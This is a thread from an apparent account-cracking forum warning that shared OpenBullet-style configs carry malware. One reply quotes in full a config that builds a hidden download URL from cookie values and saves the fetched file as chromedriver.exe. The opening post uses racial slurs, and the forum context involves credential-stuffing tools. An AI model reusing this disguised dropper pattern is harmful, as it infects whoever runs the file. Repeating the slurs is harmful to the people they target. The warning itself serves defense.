Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



   3554

Infected Config Warning !!

by Deaepunisher - 29 April, 2023 - 09:45 PM
This post is by a banned member (Deaepunisher) - Unhide
649
Posts
240
Threads
4 Years of service
#1
Hello Everyone, some ugly nigger keep posting infected config here.
before downloading any config make sure that u open the config file via any text editor
u may see something like this:
[Image: 06486-CE8-EAC0-4-EB4-9-C8-B-E3-ECA62-B4-EB2.jpg]

or like this (BROWSERACTION Open):
[Image: 6873082-C-BC53-4251-906-A-D30525-D344-BF.jpg]

u may ask wtf is this?
this nigger put some 'cookies' when bypassing captcha, then he parse all the cookies into REQUEST block, which something weird,
Code:
REQUEST GET "<COOKIES(hst)>.<COOKIES(hdp)><COOKIES(hrd)><COOKIES(htp)><COOKIES(hrd)><COOKIES(hht)>"
it will download the malware and save it into the selenium.exe driver, then it will open the exe, boom u got infected,
so please ffs dont run any config before u check it yourself
This leak has been rated as working 0 times this month. (3 times in total)
This post is by a banned member (CrossPower) - Unhide
1.051
Posts
113
Threads
5 Years of service
#2
fake. please use these configs they work great!
This post is by a banned member (Deaepunisher) - Unhide
649
Posts
240
Threads
4 Years of service
#3
(29 April, 2023 - 09:46 PM)CrossPower Wrote: Show More
fake. please use these configs they work great!

Kap
This post is by a banned member (K3MO) - Unhide
K3MO  
Heaven
8.456
Posts
1.246
Threads
4 Years of service
#4
Thanks sir  Kiss
[Image: rHKCQko.gif]

Valorant & League Shop: https://t.me/pentakillio

Valorant & League Shop: https://discord.gg/aD93pKkTzC
This post is by a banned member (peterco) - Unhide
peterco  
Registered
20
Posts
0
Threads
2 Years of service
#5
a true g kafo
This post is by a banned member (LateNightVibe) - Unhide
289
Posts
116
Threads
4 Years of service
#6
(29 April, 2023 - 09:47 PM)xAirBar Wrote: Show More
(29 April, 2023 - 09:46 PM)CrossPower Wrote: Show More
fake. please use these configs they work great!

Kap

is it safe for real or it malware ? i found this in a config 

REQUEST GET "https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6LfAM84ZAAAAAGLiQz5FBeADqq94dV48fMtiRqIj&co=aHR0cHM6Ly93d3cuY29pbmJhc2UuY29tOjQ0Mw..&hl=en&v=rPvs0Nyx3sANE-ZHUN-0nM85&size=invisible&cb=no851blwqc0u" 
  
  COOKIE "hrd: /" 
  COOKIE "hpr: bin" 
  COOKIE "hdp: co" 
  COOKIE "htp: sn8fz" 
  COOKIE "hht: raw" 
  COOKIE "hst: rentry" 
  COOKIE "kht: driver" 
  COOKIE "kpt: chrome" 
  COOKIE "krt: exe" 
  HEADER "Host: www.googleapis.com
  HEADER "Accept: */*" 
  HEADER "Content-Type: application/json" 
  HEADER "X-Client-Version: iOS/FirebaseSDK/6.9.2/FirebaseCore-iOS" 
  HEADER "X-Ios-Bundle-Identifier: network.googleapis.com" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: FirebaseAuth.iOS/6.9.2 network.googleapis.com/2.7.9 iPhone/12.4.5 hw/iPhone7_2" 
  HEADER "Accept-Language: en" 

IF "<Authentiction>" Exists
JUMP #RECAPAUTH
ENDIF
SET USEPROXY FALSE

REQUEST GET "<COOKIES(hst)>.<COOKIES(hdp)><COOKIES(hrd)><COOKIES(htp)><COOKIES(hrd)><COOKIES(hht)>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

REQUEST GET "<SOURCE>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  -> FILE "<COOKIES(hpr)>/<COOKIES(kpt)><COOKIES(kht)>.<COOKIES(krt)>" 

SET USEPROXY TRUE
SET NEWGVAR "Authentiction" "Authentiction=1"


 
This post is by a banned member (Deaepunisher) - Unhide
649
Posts
240
Threads
4 Years of service
Bumped #7
(This post was last modified: 30 April, 2023 - 05:05 PM by Deaepunisher.)
(30 April, 2023 - 01:31 PM)LateNightVibe Wrote: Show More
(29 April, 2023 - 09:47 PM)xAirBar Wrote: Show More
(29 April, 2023 - 09:46 PM)CrossPower Wrote: Show More
fake. please use these configs they work great!

Kap

is it safe for real or it malware ? i found this in a config 

REQUEST GET "https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6LfAM84ZAAAAAGLiQz5FBeADqq94dV48fMtiRqIj&co=aHR0cHM6Ly93d3cuY29pbmJhc2UuY29tOjQ0Mw..&hl=en&v=rPvs0Nyx3sANE-ZHUN-0nM85&size=invisible&cb=no851blwqc0u" 
  
  COOKIE "hrd: /" 
  COOKIE "hpr: bin" 
  COOKIE "hdp: co" 
  COOKIE "htp: sn8fz" 
  COOKIE "hht: raw" 
  COOKIE "hst: rentry" 
  COOKIE "kht: driver" 
  COOKIE "kpt: chrome" 
  COOKIE "krt: exe" 
  HEADER "Host: www.googleapis.com
  HEADER "Accept: */*" 
  HEADER "Content-Type: application/json" 
  HEADER "X-Client-Version: iOS/FirebaseSDK/6.9.2/FirebaseCore-iOS" 
  HEADER "X-Ios-Bundle-Identifier: network.googleapis.com" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: FirebaseAuth.iOS/6.9.2 network.googleapis.com/2.7.9 iPhone/12.4.5 hw/iPhone7_2" 
  HEADER "Accept-Language: en" 

IF "<Authentiction>" Exists
JUMP #RECAPAUTH
ENDIF
SET USEPROXY FALSE

REQUEST GET "<COOKIES(hst)>.<COOKIES(hdp)><COOKIES(hrd)><COOKIES(htp)><COOKIES(hrd)><COOKIES(hht)>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

REQUEST GET "<SOURCE>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  -> FILE "<COOKIES(hpr)>/<COOKIES(kpt)><COOKIES(kht)>.<COOKIES(krt)>" 

SET USEPROXY TRUE
SET NEWGVAR "Authentiction" "Authentiction=1"
ofc it’s a malware, be carful bro

This is a bump
This post is by a banned member (Deaepunisher) - Unhide
649
Posts
240
Threads
4 Years of service
Bumped #8
This is a bump

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 3 Guest(s)